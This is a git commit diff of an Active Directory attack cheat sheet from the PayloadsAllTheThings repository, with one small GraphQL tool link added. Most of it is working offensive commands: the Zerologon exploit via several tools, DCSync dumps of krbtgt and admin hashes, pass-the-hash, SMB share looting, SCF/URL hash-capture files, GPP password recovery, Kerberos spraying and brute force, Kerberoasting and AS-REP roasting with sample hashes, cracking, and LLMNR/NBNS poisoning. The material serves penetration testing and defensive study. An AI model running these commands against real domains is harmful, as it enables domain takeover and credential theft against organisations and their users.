mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
AD update CME+DCOM
This commit is contained in:
parent
22340c8fc2
commit
08b59f2856
@ -28,6 +28,7 @@
|
||||
* [GraphQL IDE - An extensive IDE for exploring GraphQL API's](https://github.com/andev-software/graphql-ide)
|
||||
* [InQL - A Burp Extension for GraphQL Security Testing](https://github.com/doyensec/inql)
|
||||
* [Insomnia - Cross-platform HTTP and GraphQL Client](https://insomnia.rest/)
|
||||
* [AutoGraphql + introspection](https://graphql-dashboard.herokuapp.com/)
|
||||
|
||||
## Exploit
|
||||
|
||||
|
@ -506,90 +506,88 @@ Exploit steps from the white paper
|
||||
5. From password change to domain admin
|
||||
6. :warning: reset the computer's AD password in a proper way to avoid any Deny of Service
|
||||
|
||||
```powershell
|
||||
$ git clone https://github.com/dirkjanm/CVE-2020-1472.git
|
||||
* `cve-2020-1472-exploit.py` - Python script from dirkjanm
|
||||
```powershell
|
||||
$ git clone https://github.com/dirkjanm/CVE-2020-1472.git
|
||||
|
||||
# Activate a virtual env to install impacket
|
||||
$ python3 -m venv venv
|
||||
$ source venv/bin/activate
|
||||
$ pip3 install .
|
||||
# Activate a virtual env to install impacket
|
||||
$ python3 -m venv venv
|
||||
$ source venv/bin/activate
|
||||
$ pip3 install .
|
||||
|
||||
# Exploit the CVE (https://github.com/dirkjanm/CVE-2020-1472/blob/master/cve-2020-1472-exploit.py)
|
||||
proxychains python3 cve-2020-1472-exploit.py DC01 172.16.1.5
|
||||
# Exploit the CVE (https://github.com/dirkjanm/CVE-2020-1472/blob/master/cve-2020-1472-exploit.py)
|
||||
proxychains python3 cve-2020-1472-exploit.py DC01 172.16.1.5
|
||||
|
||||
# Find the old NT hash of the DC
|
||||
proxychains secretsdump.py -history -just-dc-user 'DC01$' -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'CORP/DC01$@DC01.CORP.LOCAL'
|
||||
# Find the old NT hash of the DC
|
||||
proxychains secretsdump.py -history -just-dc-user 'DC01$' -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'CORP/DC01$@DC01.CORP.LOCAL'
|
||||
|
||||
# Restore password from secretsdump
|
||||
# secretsdump will automatically dump the plaintext machine password (hex encoded)
|
||||
# when dumping the local registry secrets on the newest version
|
||||
python restorepassword.py CORP/DC01@DC01.CORP.LOCAL -target-ip 172.16.1.5 -hexpass e6ad4c4f64e71cf8c8020aa44bbd70ee711b8dce2adecd7e0d7fd1d76d70a848c987450c5be97b230bd144f3c3
|
||||
deactivate
|
||||
```
|
||||
# Restore password from secretsdump
|
||||
# secretsdump will automatically dump the plaintext machine password (hex encoded)
|
||||
# when dumping the local registry secrets on the newest version
|
||||
python restorepassword.py CORP/DC01@DC01.CORP.LOCAL -target-ip 172.16.1.5 -hexpass e6ad4c4f64e71cf8c8020aa44bbd70ee711b8dce2adecd7e0d7fd1d76d70a848c987450c5be97b230bd144f3c3
|
||||
deactivate
|
||||
```
|
||||
|
||||
in .NET for Cobalt Strike's execute-assembly
|
||||
* `nccfsas` - .NET binary for Cobalt Strike's execute-assembly
|
||||
```powershell
|
||||
git clone https://github.com/nccgroup/nccfsas
|
||||
# Check
|
||||
execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local
|
||||
|
||||
```powershell
|
||||
git clone https://github.com/nccgroup/nccfsas
|
||||
# Check
|
||||
execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local
|
||||
# Resetting the machine account password
|
||||
execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local -reset
|
||||
|
||||
# Resetting the machine account password
|
||||
execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local -reset
|
||||
# Testing from a non Domain-joined machine
|
||||
execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local -patch
|
||||
|
||||
# Testing from a non Domain-joined machine
|
||||
execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local -patch
|
||||
# Now reset the password back
|
||||
```
|
||||
|
||||
# Now reset the password back
|
||||
```
|
||||
* `Mimikatz` - 2.2.0 20200917 Post-Zerologon
|
||||
```powershell
|
||||
privilege::debug
|
||||
# Check for the CVE
|
||||
lsadump::zerologon /target:DC01.LAB.LOCAL /account:DC01$
|
||||
|
||||
with Mimikatz : 2.2.0 20200917 Post-Zerologon
|
||||
# Exploit the CVE and set the computer account's password to ""
|
||||
lsadump::zerologon /target:DC01.LAB.LOCAL /account:DC01$ /exploit
|
||||
|
||||
```powershell
|
||||
privilege::debug
|
||||
# Check for the CVE
|
||||
lsadump::zerologon /target:DC01.LAB.LOCAL /account:DC01$
|
||||
# Execute dcsync to extract some hashes
|
||||
lsadump::dcsync /domain:LAB.LOCAL /dc:DC01.LAB.LOCAL /user:krbtgt /authuser:DC01$ /authdomain:LAB /authpassword:"" /authntlm
|
||||
lsadump::dcsync /domain:LAB.LOCAL /dc:DC01.LAB.LOCAL /user:Administrator /authuser:DC01$ /authdomain:LAB /authpassword:"" /authntlm
|
||||
|
||||
# Exploit the CVE and set the computer account's password to ""
|
||||
lsadump::zerologon /target:DC01.LAB.LOCAL /account:DC01$ /exploit
|
||||
# Pass The Hash with the extracted Domain Admin hash
|
||||
sekurlsa::pth /user:Administrator /domain:LAB /rc4:HASH_NTLM_ADMIN
|
||||
|
||||
# Execute dcsync to extract some hashes
|
||||
lsadump::dcsync /domain:LAB.LOCAL /dc:DC01.LAB.LOCAL /user:krbtgt /authuser:DC01$ /authdomain:LAB /authpassword:"" /authntlm
|
||||
lsadump::dcsync /domain:LAB.LOCAL /dc:DC01.LAB.LOCAL /user:Administrator /authuser:DC01$ /authdomain:LAB /authpassword:"" /authntlm
|
||||
|
||||
# Pass The Hash with the extracted Domain Admin hash
|
||||
sekurlsa::pth /user:Administrator /domain:LAB /rc4:HASH_NTLM_ADMIN
|
||||
|
||||
# Use IP address instead of FQDN to force NTLM with Windows APIs
|
||||
# Reset password to Waza1234/Waza1234/Waza1234/
|
||||
# https://github.com/gentilkiwi/mimikatz/blob/6191b5a8ea40bbd856942cbc1e48a86c3c505dd3/mimikatz/modules/kuhl_m_lsadump.c#L2584
|
||||
lsadump::postzerologon /target:10.10.10.10 /account:DC01$
|
||||
```
|
||||
# Use IP address instead of FQDN to force NTLM with Windows APIs
|
||||
# Reset password to Waza1234/Waza1234/Waza1234/
|
||||
# https://github.com/gentilkiwi/mimikatz/blob/6191b5a8ea40bbd856942cbc1e48a86c3c505dd3/mimikatz/modules/kuhl_m_lsadump.c#L2584
|
||||
lsadump::postzerologon /target:10.10.10.10 /account:DC01$
|
||||
```
|
||||
|
||||
### Open Shares
|
||||
|
||||
```powershell
|
||||
smbmap -H 10.10.10.10 # null session
|
||||
smbmap -H 10.10.10.10 -R # recursive listing
|
||||
smbmap -H 10.10.10.10 -u invaliduser # guest smb session
|
||||
smbmap -H 10.10.10.10 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18
|
||||
```
|
||||
* [smbmap](https://github.com/ShawnDEvans/smbmap)
|
||||
```powershell
|
||||
smbmap -H 10.10.10.10 # null session
|
||||
smbmap -H 10.10.10.10 -R # recursive listing
|
||||
smbmap -H 10.10.10.10 -u invaliduser # guest smb session
|
||||
smbmap -H 10.10.10.10 -d "DOMAIN.LOCAL" -u "USERNAME" -p "Password123*"
|
||||
```
|
||||
|
||||
or
|
||||
* [pth-smbclient from path-toolkit](https://github.com/byt3bl33d3r/pth-toolkit)
|
||||
```powershell
|
||||
pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share
|
||||
pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/C$
|
||||
ls # list files
|
||||
cd # move inside a folder
|
||||
get # download files
|
||||
put # replace a file
|
||||
```
|
||||
|
||||
```powershell
|
||||
pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share
|
||||
pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/C$
|
||||
ls # list files
|
||||
cd # move inside a folder
|
||||
get # download files
|
||||
put # replace a file
|
||||
```
|
||||
|
||||
or
|
||||
|
||||
```powershell
|
||||
smbclient -I 10.10.10.100 -L ACTIVE -N -U ""
|
||||
* [smbclient from Impacket](https://github.com/SecureAuthCorp/impacket)
|
||||
```powershell
|
||||
smbclient -I 10.10.10.100 -L ACTIVE -N -U ""
|
||||
Sharename Type Comment
|
||||
--------- ---- -------
|
||||
ADMIN$ Disk Remote Admin
|
||||
@ -599,29 +597,23 @@ smbclient -I 10.10.10.100 -L ACTIVE -N -U ""
|
||||
Replication Disk
|
||||
SYSVOL Disk Logon server share
|
||||
Users Disk
|
||||
use Sharename # select a Sharename
|
||||
cd Folder # move inside a folder
|
||||
ls # list files
|
||||
```
|
||||
use Sharename # select a Sharename
|
||||
cd Folder # move inside a folder
|
||||
ls # list files
|
||||
```
|
||||
|
||||
Download a folder recursively
|
||||
* [smbclient - from Samba, ftp-like client to access SMB/CIFS resources on servers](#)
|
||||
```powershell
|
||||
smbclient -U username //10.0.0.1/SYSVOL
|
||||
smbclient //10.0.0.1/Share
|
||||
|
||||
```powershell
|
||||
smbclient -U username //10.0.0.1/SYSVOL
|
||||
smbclient //10.0.0.1/Share
|
||||
smb: \> mask ""
|
||||
smb: \> recurse ON
|
||||
smb: \> prompt OFF
|
||||
smb: \> lcd '/path/to/go/'
|
||||
smb: \> mget *
|
||||
```
|
||||
|
||||
Mount a share
|
||||
|
||||
```powershell
|
||||
smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
|
||||
sudo mount -t cifs -o username=<user>,password=<pass> //<IP>/Users folder
|
||||
```
|
||||
# Download a folder recursively
|
||||
smb: \> mask ""
|
||||
smb: \> recurse ON
|
||||
smb: \> prompt OFF
|
||||
smb: \> lcd '/path/to/go/'
|
||||
smb: \> mget *
|
||||
```
|
||||
|
||||
### SCF and URL file attack against writeable share
|
||||
|
||||
@ -630,7 +622,7 @@ Drop the following `@something.scf` file inside a share and start listening with
|
||||
```powershell
|
||||
[Shell]
|
||||
Command=2
|
||||
IconFile=\\10.10.XX.XX\Share\test.ico
|
||||
IconFile=\\10.10.10.10\Share\test.ico
|
||||
[Taskbar]
|
||||
Command=ToggleDesktop
|
||||
```
|
||||
@ -641,15 +633,13 @@ This attack also works with `.url` files and `responder -I eth0 -v`.
|
||||
[InternetShortcut]
|
||||
URL=whatever
|
||||
WorkingDirectory=whatever
|
||||
IconFile=\\192.168.1.29\%USERNAME%.icon
|
||||
IconFile=\\10.10.10.10\%USERNAME%.icon
|
||||
IconIndex=1
|
||||
```
|
||||
|
||||
|
||||
### Passwords in SYSVOL & Group Policy Preferences
|
||||
|
||||
:triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local
|
||||
|
||||
Find password in SYSVOL (MS14-025). SYSVOL is the domain-wide share in Active Directory to which all authenticated users have read access. All domain Group Policies are stored here: `\\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`.
|
||||
|
||||
```powershell
|
||||
@ -669,31 +659,30 @@ echo 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aS
|
||||
|
||||
#### Automate the SYSVOL and passwords research
|
||||
|
||||
* Metasploit modules to enumerate shares and credentials
|
||||
|
||||
* `Metasploit` modules to enumerate shares and credentials
|
||||
```c
|
||||
scanner/smb/smb_enumshares
|
||||
post/windows/gather/enum_shares
|
||||
post/windows/gather/credentials/gpp
|
||||
```
|
||||
|
||||
* Crackmapexec modules
|
||||
|
||||
* CrackMapExec modules
|
||||
```powershell
|
||||
cme smb 192.168.1.2 -u Administrator -H 89[...]9d -M gpp_autologin
|
||||
cme smb 192.168.1.2 -u Administrator -H 89[...]9d -M gpp_password
|
||||
cme smb 10.10.10.10 -u Administrator -H 89[...]9d -M gpp_autologin
|
||||
cme smb 10.10.10.10 -u Administrator -H 89[...]9d -M gpp_password
|
||||
```
|
||||
|
||||
List all GPO for a domain
|
||||
* [Get-GPPPassword](https://github.com/ShutdownRepo/Get-GPPPassword)
|
||||
```powershell
|
||||
# with a NULL session
|
||||
Get-GPPPassword.py -no-pass 'DOMAIN_CONTROLLER'
|
||||
|
||||
```powershell
|
||||
Get-GPO -domaine DOMAIN.COM -all
|
||||
Get-GPOReport -all -reporttype xml --all
|
||||
# with cleartext credentials
|
||||
Get-GPPPassword.py 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER'
|
||||
|
||||
Powersploit:
|
||||
Get-NetGPO
|
||||
Get-NetGPOGroup
|
||||
```
|
||||
# pass-the-hash
|
||||
Get-GPPPassword.py -hashes 'LMhash':'NThash' 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER'
|
||||
```
|
||||
|
||||
#### Mitigations
|
||||
|
||||
@ -705,6 +694,8 @@ Get-NetGPOGroup
|
||||
|
||||
> Creators of a GPO are automatically granted explicit Edit settings, delete, modify security, which manifests as CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner
|
||||
|
||||
:triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local
|
||||
|
||||
GPO are stored in the DC in `\\<domain.dns>\SYSVOL\<domain.dns>\Policies\<GPOName>\`, inside two folders **User** and **Machine**.
|
||||
If you have the right to edit the GPO you can connect to the DC and replace the files. Planned Tasks are located at `Machine\Preferences\ScheduledTasks`.
|
||||
|
||||
@ -980,12 +971,19 @@ Most of the time the best passwords to spray are :
|
||||
|
||||
Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
|
||||
|
||||
> Kerberos pre-authentication errors are not logged in Active Directory with a normal Logon failure event (4625), but rather with specific logs to Kerberos pre-authentication failure (4771).
|
||||
> Kerberos pre-authentication errors are not logged in Active Directory with a normal **Logon failure event (4625)**, but rather with specific logs to **Kerberos pre-authentication failure (4771)**.
|
||||
|
||||
```powershell
|
||||
root@kali:~$ ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
|
||||
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
|
||||
root@kali:~$ python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
|
||||
# Username bruteforce
|
||||
root@kali:~$ ./kerbrute_linux_amd64 userenum -d domain.local --dc 10.10.10.10 usernames.txt
|
||||
|
||||
# Password brute
|
||||
root@kali:~$ ./kerbrute_linux_amd64 bruteuser -d domain.local --dc 10.10.10.10 rockyou.txt username
|
||||
|
||||
# Password spray
|
||||
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt Password123
|
||||
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt rockyou.txt
|
||||
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt '123456' -v --delay 100 -o kerbrute-passwordspray-123456.log
|
||||
```
|
||||
|
||||
#### Spray a pre-generated passwords list
|
||||
@ -1137,8 +1135,10 @@ Forging a TGT require the krbtgt NTLM hash
|
||||
|
||||
```powershell
|
||||
# Get info - Mimikatz
|
||||
lsadump::dcsync /user:krbtgt
|
||||
lsadump::lsa /inject /name:krbtgt
|
||||
lsadump::lsa /patch
|
||||
lsadump::trust /patch
|
||||
lsadump::dcsync /user:krbtgt
|
||||
|
||||
# Forge a Golden ticket - Mimikatz
|
||||
kerberos::purge
|
||||
@ -1234,46 +1234,50 @@ Mitigations:
|
||||
|
||||
> "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names)
|
||||
|
||||
Any valid domain user can request a kerberos ticket (TGS) for any domain service with `GetUserSPNs`. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as.
|
||||
Any valid domain user can request a kerberos ticket (TGS) for any domain service. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as.
|
||||
|
||||
```powershell
|
||||
$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
|
||||
|
||||
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies
|
||||
* `GetUserSPNs` from Impacket Suite
|
||||
```powershell
|
||||
$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
|
||||
|
||||
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
|
||||
-------------------- ------------- -------------------------------------------------------- ------------------- -------------------
|
||||
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40 2018-12-03 17:11:11
|
||||
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies
|
||||
|
||||
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$424338c0a3c3af43c360c29c154b012c$c54c7be163ae6c323ae6b5fc45a1eacee2f4903deec785cd689f4551e023775c7e7772fe85e3fb8374ca95534d72c971ba80e8b6d4ef3c3b8439dc54031540133cbcbd5f7b39d622733d198eec594c0cd181ab4696a6ad12744d1ddd2d3e2c6dd33b4daedbc9cae75e8ff2652c80421b0fa3a61ddf2cabeea462c44e0f6d9a6436717e0621bb4e0fe8bd3cf36156b4b2f7b81d651f70baf34a0b3071858b5034b895c25a0d3c67044c849d5952c381a0078a86ae562810a93d9c7bcc8311255cc9eda35a9c4d4d43ff1cc29108056285c954f3c633332ff0cb0c9c0f1896c792b247c8d25f5dd71802728fc99bb22709337b5596ab0e2045110b0b005b03351e9f71a65b48e8259f6191ce95d4e5794846c61c3abccf0f5f72a8679fb0dc0777720f5551ad99c9c9ab0955f85ee211d40b01fcaece7868960b2063923aa0f59e17b347f3308087707e95cad54b9df8179728821cf54cb204c5c2e571d9a66c8ec40b090305aa32e90a90d25ea37be6d8f8a83c683a8b69d386f9edb970596bc56fa02971f69c7e073b8de1213d9caa75ab652e5c5b99cadace9dd7d15d1d530309ea39ca1b7c6009ae3342796a6bdea084622ee95cbade437659e37363b848bad2186e3a9f7dec66e1e496db32d55eda8fb926f057996638646dcc662ed226788ddf36304dc70eaca91b26cb7180341f417fad91117ee10212c69423abd42769cbf891b51d736ffe474899eec8df64abef319d3c6dc379f2bfda33de7c3a1a50d6ece564d4559c77f560b7506fa2f1c9af7162f1247ea35706aafffde48b8cc48b1ec8e99d99ac81dc02f55f43f9726d746383cd076e7199070ff8100846ba9dc2235e92d0c7dac1f33da5fe7901e02f0566030d7c7e02535d6a300292a04e6c32d0d74d37679c2617750f5920d9c697a30c883519bc6b5a916eec354459c7f248c783bd79c436a7e8c463a8981a9e000d21c2d00c7e8468cff0ab695cb3aa4f14f149d1fafb4d656bcd1f67b747fc4c2d648466a386774853db8d50c22df57e747085142f98f5f06191c243b9dbf671da64228364f058c7e2e53a80fdde7f6dc2f25459a09fb2583757953247c222d64f49bc12d461d2e5aa572ceba2605d7eafd6031405ee422ac35cbf041b4fd28e58d871406e053d1a806de49056791646c175bf0d2aaa19f844bfc885520e19c391702be6ae61122fceac32b689764334908a4eaf7c69974a9519ebb068a15c087955fb402416bd184fd2
|
||||
```
|
||||
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
|
||||
-------------------- ------------- -------------------------------------------------------- ------------------- -------------------
|
||||
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40 2018-12-03 17:11:11
|
||||
|
||||
Alternatively with [Rubeus](https://github.com/GhostPack/Rubeus)
|
||||
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$424338c0a3c3af43[...]84fd2
|
||||
```
|
||||
|
||||
```powershell
|
||||
# Kerberoast (RC4 ticket)
|
||||
.\rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD /outfile:hash.txt
|
||||
* CrackMapExec Module
|
||||
```powershell
|
||||
crackmapexec ldap 10.10.10.100 -u 'username' -p 'password' --kerberoasting output.txt
|
||||
```
|
||||
|
||||
# Kerberoast (AES ticket)
|
||||
# Accounts with AES enabled in msDS-SupportedEncryptionTypes will have RC4 tickets requested.
|
||||
Rubeus.exe kerberoast /tgtdeleg
|
||||
* [Rubeus](https://github.com/GhostPack/Rubeus)
|
||||
```powershell
|
||||
# Kerberoast (RC4 ticket)
|
||||
.\rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD /outfile:hash.txt
|
||||
|
||||
# Kerberoast (RC4 ticket)
|
||||
# The tgtdeleg trick is used, and accounts without AES enabled are enumerated and roasted.
|
||||
Rubeus.exe kerberoast /rc4opsec
|
||||
```
|
||||
# Kerberoast (AES ticket)
|
||||
# Accounts with AES enabled in msDS-SupportedEncryptionTypes will have RC4 tickets requested.
|
||||
Rubeus.exe kerberoast /tgtdeleg
|
||||
|
||||
Alternatively with [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1)
|
||||
# Kerberoast (RC4 ticket)
|
||||
# The tgtdeleg trick is used, and accounts without AES enabled are enumerated and roasted.
|
||||
Rubeus.exe kerberoast /rc4opsec
|
||||
```
|
||||
|
||||
```powershell
|
||||
Request-SPNTicket -SPN "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"
|
||||
```
|
||||
* [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1)
|
||||
```powershell
|
||||
Request-SPNTicket -SPN "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"
|
||||
```
|
||||
|
||||
Alternatively on macOS machine you can use [bifrost](https://github.com/its-a-feature/bifrost)
|
||||
|
||||
```powershell
|
||||
./bifrost -action asktgs -ticket doIF<...snip...>QUw= -service host/dc1-lab.lab.local -kerberoast true
|
||||
```
|
||||
* [bifrost](https://github.com/its-a-feature/bifrost) on **macOS** machine
|
||||
```powershell
|
||||
./bifrost -action asktgs -ticket doIF<...snip...>QUw= -service host/dc1-lab.lab.local -kerberoast true
|
||||
```
|
||||
|
||||
|
||||
Then crack the ticket using the correct hashcat mode (`$krb5tgs$23`= `etype 23`)
|
||||
@ -1296,65 +1300,58 @@ Mitigations:
|
||||
|
||||
### KRB_AS_REP Roasting
|
||||
|
||||
If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting
|
||||
> If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting
|
||||
|
||||
Prerequisite:
|
||||
- Accounts have to have **DONT_REQ_PREAUTH** (`PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose`)
|
||||
**Requirements**:
|
||||
- Accounts with the attribute **DONT_REQ_PREAUTH** (`PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose`)
|
||||
|
||||
```powershell
|
||||
C:\>git clone https://github.com/GhostPack/Rubeus#asreproast
|
||||
C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user /format:hashcat /outfile:hashes.asreproast
|
||||
|
||||
______ _
|
||||
(_____ \ | |
|
||||
_____) )_ _| |__ _____ _ _ ___
|
||||
| __ /| | | | _ \| ___ | | | |/___)
|
||||
| | \ \| |_| | |_) ) ____| |_| |___ |
|
||||
|_| |_|____/|____/|_____)____/(___/
|
||||
|
||||
v1.3.4
|
||||
|
||||
|
||||
[*] Action: AS-REP roasting
|
||||
|
||||
[*] Target User : TestOU3user
|
||||
[*] Target Domain : testlab.local
|
||||
|
||||
[*] SamAccountName : TestOU3user
|
||||
[*] DistinguishedName : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local
|
||||
[*] Using domain controller: testlab.local (192.168.52.100)
|
||||
[*] Building AS-REQ (w/o preauth) for: 'testlab.local\TestOU3user'
|
||||
[*] Connecting to 192.168.52.100:88
|
||||
[*] Sent 169 bytes
|
||||
[*] Received 1437 bytes
|
||||
[+] AS-REQ w/o preauth successful!
|
||||
[*] AS-REP hash:
|
||||
* [Rubeus](https://github.com/GhostPack/Rubeus)
|
||||
```powershell
|
||||
C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user /format:hashcat /outfile:hashes.asreproast
|
||||
[*] Action: AS-REP roasting
|
||||
[*] Target User : TestOU3user
|
||||
[*] Target Domain : testlab.local
|
||||
[*] SamAccountName : TestOU3user
|
||||
[*] DistinguishedName : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local
|
||||
[*] Using domain controller: testlab.local (192.168.52.100)
|
||||
[*] Building AS-REQ (w/o preauth) for: 'testlab.local\TestOU3user'
|
||||
[*] Connecting to 192.168.52.100:88
|
||||
[*] Sent 169 bytes
|
||||
[*] Received 1437 bytes
|
||||
[+] AS-REQ w/o preauth successful!
|
||||
[*] AS-REP hash:
|
||||
|
||||
$krb5asrep$TestOU3user@testlab.local:858B6F645D9F9B57210292E5711E0...(snip)...
|
||||
```
|
||||
|
||||
C:\Rubeus> john --wordlist=passwords_kerb.txt hashes.asreproast
|
||||
```
|
||||
* `GetNPUsers` from Impacket Suite
|
||||
```powershell
|
||||
$ python GetNPUsers.py htb.local/svc-alfresco -no-pass
|
||||
[*] Getting TGT for svc-alfresco
|
||||
$krb5asrep$23$svc-alfresco@HTB.LOCAL:c13528009a59be0a634bb9b8e84c88ee$cb8e87d02bd0ac7a[...]e776b4
|
||||
|
||||
Using `impacket` to get the hash and `hashcat` to crack it.
|
||||
# extract hashes
|
||||
root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
|
||||
root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
|
||||
```
|
||||
|
||||
* CrackMapExec Module
|
||||
```powershell
|
||||
crackmapexec ldap 10.10.10.100 -u 'username' -p 'password' --asreproast output.txt
|
||||
```
|
||||
|
||||
Using `hashcat` or `john` to crack the ticket.
|
||||
|
||||
```powershell
|
||||
# example
|
||||
$ python GetNPUsers.py htb.local/svc-alfresco -no-pass
|
||||
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
|
||||
|
||||
[*] Getting TGT for svc-alfresco
|
||||
$krb5asrep$23$svc-alfresco@HTB.LOCAL:c13528009a59be0a634bb9b8e84c88ee$cb8e87d02bd0ac7ae561334cd58a56af90f7fbb20bbd4493b6754a57d5ebc08cb7f47ea472ebb7c9ba4260f57c11b664be03191550254e5c77a17518aeabc55f9321bd9f52201df820e130aa0e3f4b0986725fd3a14794433881050eb62d384c4058a407a348a7de2ef0767a99c9df4f85d8eba8ce30a4ad59621c51f8ea8c0d33f33e06bea1d8ff28d7a86fc2010fd7fa45d2fcc2178cb13c1006823aec8a5da10cffcceeb6e978754b0d4976df5cccb4beb9776d5a8f4810153ccc0e1237ec74e6ae61402457c6cfe29bca7c2f62b287f13aff063f5a0a21c728581e43b46d7537b3e776b4
|
||||
|
||||
# extract hashes
|
||||
root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
|
||||
root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
|
||||
|
||||
# crack AS_REP messages
|
||||
# crack AS_REP messages with hashcat
|
||||
root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
|
||||
root@windows:hashcat$ hashcat64.exe -m 18200 '<AS_REP-hash>' -a 0 c:\wordlists\rockyou.txt
|
||||
|
||||
# crack AS_REP messages with john
|
||||
C:\Rubeus> john --format=krb5asrep --wordlist=passwords_kerb.txt hashes.asreproast
|
||||
```
|
||||
|
||||
Mitigations:
|
||||
**Mitigations**:
|
||||
* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default).
|
||||
|
||||
### Pass-the-Hash
|
||||
@ -1431,14 +1428,15 @@ C:\Users\triceratops>.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd
|
||||
|
||||
If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network.
|
||||
|
||||
```python
|
||||
python Responder.py -I eth0
|
||||
```
|
||||
|
||||
Then crack the hash with `hashcat`
|
||||
|
||||
```powershell
|
||||
hashcat -m 5600 -a 0 hash.txt crackstation.txt
|
||||
# https://github.com/lgandx/Responder
|
||||
$ sudo ./Responder.py -I eth0 -wfrd -P -v
|
||||
|
||||
# https://github.com/Kevin-Robertson/InveighZero
|
||||
PS > .\inveighzero.exe -FileOutput Y -NBNS Y -mDNS Y -Proxy Y -MachineAccounts Y -DHCPv6 Y -LLMNRv6 Y [-Elevated N]
|
||||
|
||||
# https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Invoke-Inveigh.ps1
|
||||
PS > Invoke-Inveigh [-IP '10.10.10.10'] -ConsoleOutput Y -FileOutput Y -NBNS Y –mDNS Y –Proxy Y -MachineAccounts Y
|
||||
```
|
||||
|
||||
### Man-in-the-Middle attacks & relaying
|
||||
@ -1452,6 +1450,12 @@ NTLMv1 and NTLMv2 can be relayed to connect to another machine.
|
